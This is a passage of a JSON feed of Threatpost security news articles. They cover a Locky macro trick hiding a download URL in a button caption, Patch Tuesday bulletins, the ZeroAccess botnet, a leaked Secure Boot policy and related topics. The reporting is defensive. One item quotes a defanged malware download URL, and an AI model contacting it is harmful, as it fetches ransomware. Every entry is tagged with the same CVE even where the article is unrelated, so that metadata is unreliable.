One of the buttons contained the encrypted URL.\n\nThe researchers said at first the VBA modules looked legit. \u201cNo malicious code found there \u2026 However, after further investigation we noticed a strange string in the Caption field for CommandButton3 in the user form,\u201d the researchers wrote.\n\nAs it turned out, the attackers were embedding the malware using a \u201csneaky new trick.\u201d Upon further inspection, Microsoft said, the attacker stored commands inside the name of a macro button. When the macro was executed, it was directed to decrypt the data string used to name the macro button. Contained in the data string were commands to visit a specific URL from which the malware could be downloaded onto the targeted computer.\n\n\u201cThe macro will connect to the URL (hxxp://clickcomunicacion.es/<uniqueid>) to download a payload which we detect as Ransom:Win32/Locky,\u201d Microsoft wrote.\n\n\u201cAfter the macro runs, it is instructed to find the button and extract the (button\u2019s) name. Next, take that string (or the button\u2019s name) and decrypt it. Then the URL downloads the executable,\u201d commented Ryan Olson, researcher at Palo Alto, in an interview with Threatpost. Olson said he has never seen this technique before, but there is nothing remarkable about the macro. \u201cThe Microsoft find is yet another iteration of a macro that uses a slightly different technique to evade detection.\u201d He said the technique is slick, but par for the course in the whack-a-mole arms race to trick and detect macros.\n\nAccording to Palo Alto, macro attacks are on the rise. This year Palo Alto reports 1.2 million instances of the Bartallex family of malware delivered via malicious macro documents. That\u2019s up from last year\u2019s 100,000 instances of Bartallex family macro malware.\n\n\u201cWe suspect that macro-based attacks are experiencing a resurgence from the late 1990s. 
There is a whole new pool of victims that don\u2019t remember how dangerous macros were and are learning the hard way to never trust macros unless sent from a 100 percent reliable source,\u201d Olson said.\n", "cvss3": {}, "published": "2016-05-21T09:00:53", "type": "threatpost", "title": "Microsoft Warns of Sneaky New Macro Trick", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-05-23T15:32:11", "id": "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "href": "https://threatpost.com/microsoft-warns-of-sneaky-new-macro-trick/118227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "In a move that has surprised many in the security community, Microsoft has disbanded its Trustworthy Computing unit, the group that was responsible for the pioneering work that helped reverse the company\u2019s security reputation and make Windows a much more secure and reliable computing platform.\n\nThe end of the TwC group comes as Microsoft is in the middle of a major shift. The company on Thursday announced it was laying off 2,100 employees and also that it was closing its research facility in Silicon Valley. Under the changes in the security group at Microsoft, some of the TwC employees will be reassigned to the Cloud and Enterprise division and others will wind up in the legal group. The move presumably is an effort to integrate the security and privacy expertise in the TwC group into the rest of the company.\n\nThe break-up of the TwC group marks the end of an era at Microsoft, an era that began with the [memo that Bill Gates sent](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089>) to company employees in January 2002. 
Microsoft had been under fire from some of its larger customers\u2013government agencies, financial companies and others\u2013about the security problems in Windows, issues that were being brought front and center by a series of self-replicating worms and embarrassing attacks. Gates realized that the company was in danger of losing a large chunk of business if it didn\u2019t start making some changes regarding security, so he made the development of more secure products and platforms a top priority for all of Microsoft.\n\nThat began with putting developers through security training and also included stopping production on a major update to Windows in order to get the security of it right. It continued with Microsoft hiring security researchers, privacy experts and top software security people and eventually led to the creation of the Trustworthy Computing group. Gates\u2019s memo contemplated many of the changes that would come to computing, as well as the threats that would emerge.\n\n\u201cIn the past, we\u2019ve made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We\u2019ve done a terrific job at that, but all those great features won\u2019t matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security. Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid email borne viruses. If we discover a risk that a feature could compromise someone\u2019s privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. 
These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services,\u201d he wrote in the [memo](<http://www.computerbytesman.com/security/billsmemo.htm>).\n\n\u201cGoing forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.\u201d\n\nOver the years, the TwC group accomplished much of that, and more. Breaking the group up may disperse into the rest of the company the expertise that\u2019s been concentrated in TwC, enabling the security experts to work more closely with the engineering teams and other groups inside the company. Or it may lead to an exodus of talent from Redmond. Either way, it signals a turning point for Microsoft and its decade-long effort to make security a priority. Computing has evolved dramatically in that time, as have Microsoft\u2019s product offerings, priorities and challenges. 
Microsoft\u2019s decision to eliminate the TwC group is just another indication of those changing times.\n", "cvss3": {}, "published": "2014-09-19T11:43:52", "type": "threatpost", "title": "Era Ends With Break Up of Trustworthy Computing Group at Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:58:40", "id": "THREATPOST:90355E85731E1618F6C63A58CD426966", "href": "https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:23", "description": "The expected continued respite from deploying Internet Explorer patches was apparently a mirage as Microsoft changed course from last Thursday\u2019s advance notification and added two more bulletins to the [February 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-feb>), including the first IE rollup of 2014.\n\nIE had been patched monthly for close to a year until the January security bulletins were released, and eyebrows were raised again last Thursday when there was no mention of an IE update.\n\nToday, however, Microsoft reversed course with [MS14-010](<https://technet.microsoft.com/en-us/security/bulletin/ms14-010>), which patches 24 vulnerabilities in the browser, including one that has been publicly disclosed. No active exploits have been reported, Microsoft said.\n\nAll of the vulnerabilities enable remote code execution, and affect versions of IE going back to IE 6 on Windows XP up to IE 11 on Windows 8.1. 
More than 20 CVEs involving memory corruption vulnerabilities in IE were addressed along with a cross-domain information disclosure vulnerability, an elevation of privilege vulnerability and a memory corruption issue related to VBScript that is addressed in [MS14-011](<https://technet.microsoft.com/en-us/security/bulletin/ms14-011>).\n\nAn IE user would have to be lured to a website hosting an exploit for the vulnerability in the VBScript scripting engine in Windows. The engine improperly handles objects in memory, Microsoft said, and an exploit could corrupt memory and allow an attacker to run code on a compromised machine.\n\n\u201cTo go from five to seven bulletins says to me that initial testing was completed last minute so they decided to slip the patch in or testing found an issue and engineer shipped a fix last minute,\u201d said Tyler Reguly, manager of security research at Tripwire. \u201cEither way, pay extra attention to MS14-010 and MS14-011 in your test environments this month before you push them out enterprise wide.\u201d\n\nColleague Craig Young cautions that a number of the IE vulnerabilities can be combined to gain admin access on compromised machines.\n\n\u201cWithout any doubt, attacks in the wild will continue and expand to the other vulnerabilities being fixed today,\u201d Young said.\n\nAs promised, Microsoft did patch a remote code execution vulnerability, [MS14-008](<https://technet.microsoft.com/en-us/security/bulletin/ms14-008>), in its Forefront Protection for Exchange 2010 security product. Microsoft said it removed the offending code from the software.\n\n\u201cI\u2019m sure a lot of people will call attention to the Forefront Protection for Exchange patch this month. However when Microsoft, the people with the source code, tells us they can\u2019t trigger the vulnerability in a meaningful way, I intend to believe them,\u201d said Tripwire\u2019s Reguly. 
\u201cI suspect we\u2019ll wake up tomorrow and beyond pressing apply, we\u2019ll forget this was even released.\u201d\n\nMicrosoft stopped updating Forefront for Exchange as of September 2012, but will support it with security updates for another 22 months.\n\n\u201cThis should make administrators think about upgrading their Exchange servers to the latest version (which includes basic anti-malware protection by default) or consider a third party email security application,\u201d said Russ Ernst of Lumension. \u201cAdministrators that currently use Forefront Protection for Exchange have until December 2015 to get this done.\u201d\n\nThe final critical bulletin, [MS14-007](<https://technet.microsoft.com/en-us/security/bulletin/ms14-007>), is another remote code execution bug in Direct2D, which can only be triggered by viewing malicious content in IE. Direct2D is a graphics API used for rendering 2-D geometry, bitmaps and text, Microsoft said. This vulnerability affects Windows 7 through Windows 8.1.\n\nMicrosoft also released three bulletins rated important that patch privilege elevation, information disclosure and denial of service vulnerabilities.\n\n * [MS14-009](<https://technet.microsoft.com/en-us/security/bulletin/ms14-009>) patches two publicly disclosed bugs in the .NET framework that could allow an attacker to elevate their privileges on a compromised machine.\n * [MS14-005](<https://technet.microsoft.com/en-us/security/bulletin/ms14-005>) handles a vulnerability in Microsoft XML Core Services that could lead to information disclosure if the victim visits a malicious site with IE.\n * [MS14-006](<https://technet.microsoft.com/en-us/security/bulletin/ms14-006>) addresses a denial-of-service vulnerability in Windows 8, RT, and Server 2012 that has been publicly disclosed. 
An attacker would have to send a large number of malicious IPv6 packets to a vulnerable system to exploit the bug, and the attacker must be on the same subnet as the victim.\n\nMicrosoft also sent out an update that officially [deprecates the use of the MD5 hash algorithm](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>). Digital certificates with MD5 hashes issued under roots in the Microsoft root certificate program are from now on restricted.\n\n\u201cCertificates with MD5 hashes should no longer be considered safe,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing. \u201cWe\u2019ve given our customers six months to prepare their environments, and now this update is available through automatic updates.\u201d\n", "cvss3": {}, "published": "2014-02-11T14:19:34", "type": "threatpost", "title": "February 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-11T19:19:34", "id": "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "href": "https://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Long thought dead, the peer-to-peer (P2P) ZeroAccess botnet has resurfaced, and as of just a few weeks ago, has returned to propagating click-fraud scams.\n\nResearchers with Dell\u2019s SecureWorks [revealed Wednesday](<http://www.secureworks.com/resources/blog/zeroaccess-botnet-resumes-click-fraud-activity-after-six-month-break/>) that they witnessed the botnet restart itself from March 21 to July 2, 2014 and that halfway through this month \u2013 six months after it was last seen \u2013 the botnet has apparently gone back to its old ways and is again doling out click-fraud templates.\n\nClick-fraud, one of the easier techniques cybercriminals use to monetize 
malware, is essentially the embezzling of ad revenue from clicks that don\u2019t come from legitimate customers.\n\nDespite the botnet\u2019s resurfacing, researchers insist it hasn\u2019t grown or even tried to incorporate new compromises. Instead the botnet, which has split into two smaller botnets that use different UDP ports, is built around hosts from past infections.\n\nAs seen below, researchers found ZeroAccess in two smaller botnets in both 32-bit (blue) and 64-bit (gray) compromised Windows systems.\n\n\u201cCompromised systems act as nodes in the P2P network, and they periodically receive new templates that include URLs for attacker-controlled template servers,\u201d the firm\u2019s Counter Threat Unit (CTU) wrote.\n\nOnce the URLs are visited, like a chain reaction, the bots are redirected to their final destination.\n\nThe unit claims it counted 55,000-plus different IP addresses \u2013 mostly in Japan, India and Russia \u2013 engaging with the botnet from Jan. 17 to Jan. 25. Some may consider 55K small potatoes compared to the botnet\u2019s heyday, when Microsoft cleaned half a million machines of the virus from Feb. to March 2013, but Dell is stressing that for all intents and purposes ZeroAccess should still be considered substantial.\n\nDell added that while it may not be able to do what other flashy botnets can, like carry out banking fraud or hold users\u2019 files ransom, ZeroAccess can still wreak havoc on advertisers and the machines it infects alike.\n\nIt was thought the [botnet was dead](<http://threatpost.com/microsoft-zeroaccess-botnet-has-been-abandoned/103273>) in December 2013 after Microsoft, along with Europol\u2019s European Cybercrime Centre (EC3), the F.B.I., and the firm A10 [disrupted ZeroAccess\u2019s](<http://threatpost.com/microsoft-and-friends-take-down-zeroaccess-botnet/103122>) two million odd machines. Click-fraud is just one of the botnet\u2019s favorite pastimes. 
ZeroAccess, a/k/a Sirefef, has also been seen hijacking search results and redirecting victims to malicious, information-stealing websites, and for a short stint the platform was even spotted [facilitating Bitcoin mining](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/77168>).\n\n[Microsoft greatly curbed](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/100717>) the botnet\u2019s click-fraud tendencies in May 2013 after it added its signature to its Malicious Software Removal Tool (MSRT) and cleaned all the infected machines it could find of ZeroAccess.\n", "cvss3": {}, "published": "2015-01-29T14:25:48", "type": "threatpost", "title": "ZeroAccess Returns, Resumes Click-Fraud Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:27", "id": "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "href": "https://threatpost.com/zeroaccess-botnet-returns-resumes-click-fraud-activity/110736/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:56", "description": "**Update** Opponents of the government\u2019s constant talk about [intentional backdoors](<https://threatpost.com/harvard-paper-rebuts-going-dark/116095/>) and [exceptional access](<https://threatpost.com/crypto-leaders-exceptional-access-will-undo-security/113639/>) finally may have their case study as to why it\u2019s such a bad idea.\n\nTwo researchers operating under aliases ([my123](<https://twitter.com/never_released>) and [slipstream](<https://twitter.com/TheWack0lian>)) this week posted a [report](<https://rol.im/securegoldenkeyboot/>)\u2014accompanied by a relentless chiptune\u2014that reveals how Microsoft inadvertently published a Secure Boot policy that acts as a backdoor that allows for the UEFI firmware feature to be disabled and for anyone to load unsigned or self-signed code.\n\nThe gaffe, meant to be a 
legitimate debugging and testing feature, affects Windows-based devices with Secure Boot on by default; Secure Boot checks that any components loaded during boot are [digitally signed (by Microsoft) and verified](<https://blogs.technet.microsoft.com/dubaisec/2016/03/14/diving-into-secure-boot/>). As a result of the error, users can run self-signed binaries on affected devices or install non-Windows operating systems.\n\nWorse, the researchers said, is that it\u2019s unlikely Microsoft can clean up this mess. For two months running, Microsoft has published security bulletins on [Patch Tuesday](<https://threatpost.com/windows-pdf-library-flaw-puts-edge-users-at-risk-for-rce/119773/>) that include updates to Secure Boot. Neither, according to my123 and slipstream, has fully addressed this issue.\n\n\u201cIt\u2019d be impossible in practise for MS to revoke every bootmgr earlier than a certain point, as they\u2019d break install media, recovery partitions, backups, etc,\u201d the researchers wrote in their report.\n\n~~Microsoft did not respond to a request for comment in time for publication.~~\n\n\u201cThe jailbreak technique described in the researchers\u2019 report on August 10 does not apply to desktop or enterprise PC systems. It requires physical access and administrator rights to ARM and RT devices and does not compromise encryption protections,\u201d a Microsoft spokesperson told Threatpost via email.\n\nMicrosoft\u2019s first pass at fixing this in June, [MS16-094](<https://technet.microsoft.com/en-us/library/security/ms16-094.aspx>), blacklisted most, but not all, of the relevant policies, the researchers said. An attacker would still be able to manipulate bootmgr, which manages boot sequences in Windows, in order to bypass Secure Boot. 
The second patch, released this week in [MS16-100](<https://technet.microsoft.com/en-us/library/security/ms16-100.aspx>), says it revokes bootmgrs and updates the Secure Boot dbx, which includes the addition of new SHA256 hashes. The researchers, however, said this patch may not be complete either.\n\n\u201cI checked the hash in the signature of several bootmgrs of several architectures against this list, and found no matches,\u201d slipstream said. \u201cSo either this revokes many \u2018obscure\u2019 bootmgrs and bootmgfws, or I\u2019m checking the wrong hash.\u201d\n\nWith the policy now available online, Windows devices, including Windows RT, HoloLens, Windows Phone, maybe Surface Hub, the researchers said, can have their versions of Secure Boot disabled.\n\n\u201cA backdoor, which MS put in to secure boot because they decided to not let the user turn it off in certain devices, allows for secure boot to be disabled everywhere! You can see the irony,\u201d the researchers wrote. \u201cAlso the irony in that MS themselves provided us several nice \u2018golden keys\u2019 (as the FBI would say) for us to use for that purpose :)\u201d\n\nThe irony is not lost on anyone who was watching the Apple-FBI saga from early this year, during which the government asked Apple to create an intentionally weakened version of iOS that would disable or bypass existing protections on a terrorist\u2019s iPhone that would wipe the phone after x-number of missed passcode guesses.\n\nApple fought the FBI in court, challenging the constitutionality of the government\u2019s demand, which was eventually dropped after the FBI found an unnamed third party who could crack the phone.\n\nThe Secure Boot report calls out the FBI specifically.\n\n\u201cAbout the FBI: are you reading this? If you are, then this is a perfect real world example about why your idea of backdooring cryptosystems with a \u2018secure golden key\u2019 is very bad!,\u201d the researchers wrote. 
\u201cSmarter people than me have been telling this to you for so long, it seems you have your fingers in your ears. You seriously don\u2019t understand still? Microsoft implemented a \u2018secure golden key\u2019 system. And the golden keys got released from MS own stupidity. Now, what happens if you tell everyone to make a \u201csecure golden key\u201d system? Hopefully you can add 2+2\u2026\u201d\n\n_This article was updated Aug. 11 with a comment from Microsoft._\n", "cvss3": {}, "published": "2016-08-11T11:31:39", "type": "threatpost", "title": "Microsoft Mistakenly Leaks Secure Boot Key", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-08-16T11:52:46", "id": "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "href": "https://threatpost.com/microsoft-mistakenly-leaks-secure-boot-key/119828/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:43", "description": "The \u201ccritical\u201d WINS vulnerability that Microsoft issued a patch for last week is now being exploited actively in the wild, [according to the SANS Institute](<http://isc.sans.org/diary.html?storyid=6976>) [sans.org].\n\nThe Internet Storm Center (ISC), which is operated by SANS, is receiving preliminary reports that hackers are targeting Microsoft\u2019s WINS service on Windows NT, 2000 and 2003 servers. 
[Read the full story](<http://www.cio.com/article/499904/Windows_WINS_Attacks_in_the_Wild?source=rss_security>) [networkworld.com]\n", "cvss3": {}, "published": "2009-08-19T14:44:56", "type": "threatpost", "title": "Windows WINS Attacks In The Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:50", "id": "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "href": "https://threatpost.com/windows-wins-attacks-wild-081909/72957/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "description": "On Oct. 9, 2003, Microsoft announced its new security patching process that would end up being a catalyst for significant change in the information security community. Ten years ago, the program was announced with a press release that promised:\n\n * \u201cImproved patch management processes, policies and technologies to help customers stay up to date and secure.\u201d\n * \u201cGlobal education programs to provide better guidance and tools for securing systems.\u201d\n\nWithin the [press release](<http://www.prnewswire.com/news-releases/microsoft-outlines-new-initiatives-in-ongoing-security-efforts-to-help-customers-72447792.html>), chief executive officer Steve Ballmer said: \u201cOur goal is simple: Get our customers secure and keep them secure. Our commitment is to protect our customers from the growing wave of criminal attacks.\u201d\n\nThose of us working in the security industry or with corporate information security responsibility saw this as a direct response to the famous [Trustworthy Computing memo](<http://www.microsoft.com/en-us/news/features/2012/jan12/gatesmemo.aspx>) penned by Bill Gates in January 2002. The signs were clear. Microsoft was faced with a serious dilemma. 
Its software was riddled with security holes that were having a direct negative effect on its customers\u2019 security, availability and privacy. In corporate IT, Microsoft had quickly gotten its own nickname of \u201cnecessary evil.\u201d IT managers were forced to use Microsoft software for its business features, but it came at the cost of serious security risks.\n\nWhether you like or disdain Microsoft, the new security initiatives started 10 years ago created a great wave of change in our information security industry.\n\nFor starters, Microsoft proved to the security community that communication is a key cornerstone of vendor relationships. No one likes to admit they have security problems. Microsoft not only admitted it had a problem, but also committed to delivering ongoing communications to its customers and to all computing users. Microsoft started blogging about security issues and also embarked on serious outbound communication campaigns to educate users.\n\nMicrosoft showed that communication and relationships are a two-way street. The powerhouse eventually grew to an age where it embraced the same community of people who were responsible for finding and publicly releasing security holes in its software. Today, public disclosure of serious Microsoft security holes is the exception.\n\nAlso, resource planning is table stakes in the enterprise IT world. Being a cost center doesn\u2019t help much, but IT has traditionally been underfunded and underappreciated. What is an enterprise IT or security manager supposed to do when their primary software vendor springs on them a critical security patch with do-or-die consequences? Historically, and still the case today, a lot of ongoing projects get dropped to quickly reallocate resources to the moment\u2019s critical security patch. 
Living in a world of constant interruption is detrimental to morale and to the completion of any planned projects.\n\nWith Microsoft\u2019s new consistent patch release timing, enterprise IT could depend on a schedule and allocate resources accordingly. The monthly patching cycle soon became better known as Patch Tuesday. Later in Microsoft\u2019s maturity model, it would introduce the advanced notification service. We know this today as the Thursday before Patch Tuesday, when we receive a high-level snippet of what to expect the following week.\n\nMicrosoft also proved the value of consistency in other ways. For example, Microsoft took the early bold step of defining its security criticality ratings and made the definitions public. Even Microsoft\u2019s security bulletin text format and sections were delivered in a consistent format that security professionals have come to rely upon. Security people like repeatable and dependable systems. Microsoft delivered just that.\n\nThree cheers to Patch Tuesday. It\u2019s the second Tuesday of each month that we both love and hate. Ten years ago, the Patch Tuesday initiatives created profound benefits for all Microsoft consumers by making it easier to keep systems patched and more secure. At the time, the idea seemed so foreign, but it has since gained so much following that other vendors such as Cisco, Adobe and Oracle have followed suit. 
Spend just five minutes and consider where you\u2019d be today without Microsoft taking the leap 10 years ago.\n\n_Andrew Storms is the Director of DevOps for CloudPassage._\n", "cvss3": {}, "published": "2013-10-02T09:40:46", "type": "threatpost", "title": "A Decade of Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-10-07T15:44:02", "id": "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "href": "https://threatpost.com/take-time-to-reflect-as-microsoft-patch-tuesday-turns-10/102488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:26", "description": "Microsoft has announced plans to give away free versions of its COFEE (Computer Online Forensic Evidence Extractor) utility to help law enforcement agencies in cyber-crime investigations. \n\nCOFEE uses digital forensic technologies to help investigators gather evidence of live computer activity at the scene of a crime, regardless of technical expertise. \n\nLaw enforcement agents with less than 10 minutes of training can capture live evidence of illegal activity by inserting the COFEE USB device into a computer. \n\nThe evidence is then preserved for analysis, protecting it from being destroyed when the computer is turned off to be moved. \n\nMicrosoft explains:\n\n> A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. Live evidence, such as some active system processes and network data, is volatile and may be lost while a computer is turning off. This evidence may contain information that could assist in the investigation and prosecution of a crime. With COFEE, a front-line officer doesn\u2019t have to be a computer expert to capture this volatile information before turning off the computer on the scene for later analysis. 
An officer with minimal computer experience can be tutored to use a pre-configured COFEE device in less than 10 minutes. This enables him or her to take advantage of common digital forensics tools the experts use to gather important volatile evidence while doing little more than simply inserting a USB device into the computer.\n\n[Read the full announcement](<http://www.microsoft.com/presspass/press/2009/oct09/10-13cofeepr.mspx>) [microsoft.com] \n", "cvss3": {}, "published": "2009-10-19T18:59:24", "type": "threatpost", "title": "Free COFEE Helps Law Enforcement Forensics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:24:46", "id": "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "href": "https://threatpost.com/free-cofee-helps-law-enforcement-forensics-101909/72343/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. 
Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). 
But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "cvss3": {}, "published": "2014-09-23T08:53:50", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-25T18:08:18", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "[](<https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/>)Microsoft has released a new fuzzing tool designed specifically to find mistakes in regular expressions in application code that could be vulnerable to attack. The [SDL Regex Fuzzer](<https://www.microsoft.com/downloads/en/details.aspx?FamilyID=8737519c-52d3-4291-9034-caa71855451f>) identifies problematic lines that might cause an application to be susceptible to attacks that consume huge amounts of resources and cause denial-of-service conditions.\n\nThe new fuzzer is meant to be used specifically to find vulnerable regular expressions in application code that could lead to a special kind of attack known as a ReDoS. 
Microsoft officials say that as more and more applications are moved to cloud providers, attackers will begin to focus their attention on those applications in new and profitable ways.\n\n\u201cI\u2019ve [predicted](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) before that as cloud computing gains wider adoption, we\u2019ll start to see a significant increase in denial of service (DoS) attacks against those services. When you\u2019re paying for the processor time, bandwidth and storage that your applications use, attacks that explicitly target and consume those resources can get very expensive very quickly, not to mention the costs of downtime for legitimate users. Attackers will shift from pursuing elusive privilege elevation vulnerabilities to simply blackmailing SaaS providers: pay me $10,000 or I\u2019ll make your app consume $20,000 worth of server resources,\u201d Microsoft\u2019s Bryan Sullivan wrote in a blog post explaining the SDL Regex Fuzzer.\n\nAs Sullivan explains in an [article](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) on the problem from earlier this year, a small change to an input string can cause major problems for a regular expression engine.\n\n\u201cHere is where things get \u2018interesting\u2019 (as in horribly dangerous). Instead of just checking that the next character after 5 is not the end of the string, the engine treats the next character, 6, as a new capture group and starts rechecking from there. Once that route fails, it backs up to 1234 and then tries 56 as a separate capture group, then 5 and 6 each as separate capture groups. The end result is that the engine actually ends up evaluating 32 different paths,\u201d he wrote.\n\n\u201cIf we now add just one more numeric character to the evaluation string, the engine will have to evaluate 64 paths\u2014twice as many\u2014to determine that it\u2019s not a match. 
This is an exponential increase in the amount of work being performed by the regex engine. An attacker could provide a relatively short input string\u201430 characters or so\u2014and force the engine to process hundreds of millions of paths, tying it up for hours or days.\u201d\n\nThe new fuzzer is free to download.\n", "cvss3": {}, "published": "2010-10-13T18:08:57", "type": "threatpost", "title": "Microsoft Releases New Regex Fuzzer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:31", "id": "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "href": "https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/74571/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "Microsoft is looking into a potential security issue affecting its Xbox 360 video game console this week after a group of college students claimed they were able to extract the credit card information of a console\u2019s previous owner from the machine.\n\nAshley Podhradsky, Rob D\u2019Ovidio, and Cindy Casey of Drexel University and Pat Engebretson of Dakota State University reportedly bought a refurbished Xbox from a Microsoft-authorized reseller in 2011 and were able to access old files containing the credit card information of the device\u2019s first owner. 
